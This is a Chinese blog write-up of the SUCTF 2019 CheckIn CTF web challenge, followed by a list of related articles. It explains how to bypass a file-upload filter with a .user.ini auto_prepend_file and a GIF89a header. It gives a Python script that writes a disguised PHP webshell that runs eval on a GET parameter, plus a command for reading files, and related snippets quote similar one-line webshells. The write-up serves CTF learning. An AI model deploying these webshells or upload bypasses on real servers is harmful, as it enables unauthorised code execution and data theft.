SUCTF2019 CheckIn

最新推荐文章于 2023-12-06 23:09:40 发布
最新推荐文章于 2023-12-06 23:09:40 发布
阅读量668 收藏 1
点赞数 2
分类专栏: web 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39563369/article/details/103289843
版权
  • 对文件后缀的黑名单匹配
    通过上传配置文件.user.ini绕过
    .user.ini
    auto_prepend_file:指定的文件能够在主文件执行前自动被解析。
    auto_append_file:指定的文件的内容在主文件执行后自动被解析

如果php脚本使用了exit()中断退出,auto_append_file就不会被执行

于是可以通过上传.user.ini,然后再上传一个指定的文件,文件里面写了php脚本,从而实现php代码执行。

  • 对文件类型的匹配
    通过添加gif文件头GIF89a绕过
  • 对<?的匹配
    php7以前可以通过<script language=‘php’></script>和<%%>的方式执行php代码,本题是php5.6可行。
  • 生成文件的py脚本
user_ini = b"""GIF89a
auto_prepend_file=evil.gif
"""

shell = b"""GIF89a
<script language='php'>echo 'insert!'; eval($_GET[c]);</script>
"""

with open('.user.ini',"wb") as file1:
    file1.write(user_ini)
with open('evil.gif',"wb") as file2:
    file2.write(shell)
print('done')

首先生成2个文件。上传后再访问上传路径下的index.php,此时evil.gif中的php代码会首先被解释执行,于是可以通过c执行命令

?c=system("cat /flag");

得到flag

mmsakai
关注
专栏目录
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
[SUCTF 2019]CheckIn 1
shinygod的博客
02-09 2573
知识点:exif_imagetype() 、 .user.ini 文章目录:题解参考 题解 文件上传,我们传一个带一句话马的图片 <?php @eval($_REQUEST['cmd']);?> 但是它提示我们不能有<?,那我们就换一种 <script language="php">eval($_REQUEST['cmd']);</script> 在这边,它用了一个exif_imagetype函数来判断文件类型。 平时简单一点的文件类型检查就是$_FIL
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 6303
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF 2019]CheckIn(文件上传)
记录学习,一起进步
03-27 567
[SUCTF 2019]CheckIn(文件上传)
[SUCTF 2019]CheckIn1
biggerpig的博客
09-29 1846
[SUCTF 2019]CheckIn1
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1193
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
web:[SUCTF 2019]CheckIn(一句话木马,.user.ini)
sleepywin的博客
12-06 197
换一种写法,需要加上GIF89a,进行exif_imagetype绕过。这里用.user.ini或者用post传参system('cat/flag')上传了一个文本,显示失败,不是图片。上传文件,随便上传一个文件试试。.user.ini内容为。那就换图片马上传试试。
BUUCTF-[SUCTF 2019]CheckIn
m0_61361405的博客
10-10 147
`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!13. `if (!`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。
文件上传之.htaccess和.user.ini
m0_46587008的博客
05-20 1459
文章目录前言一、基本描述二、配置与使用三、实战1、总结 前言 提示:最近写文件上传的题目经常碰到关于.htaccess和.user.ini文件的使用问题,我不了解Apache和php配置文件,所以想借着这次机会好好着重了解一些这两个配置文件 一、基本描述 1、.htaccess。 百科对于.htaccess的解读是:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值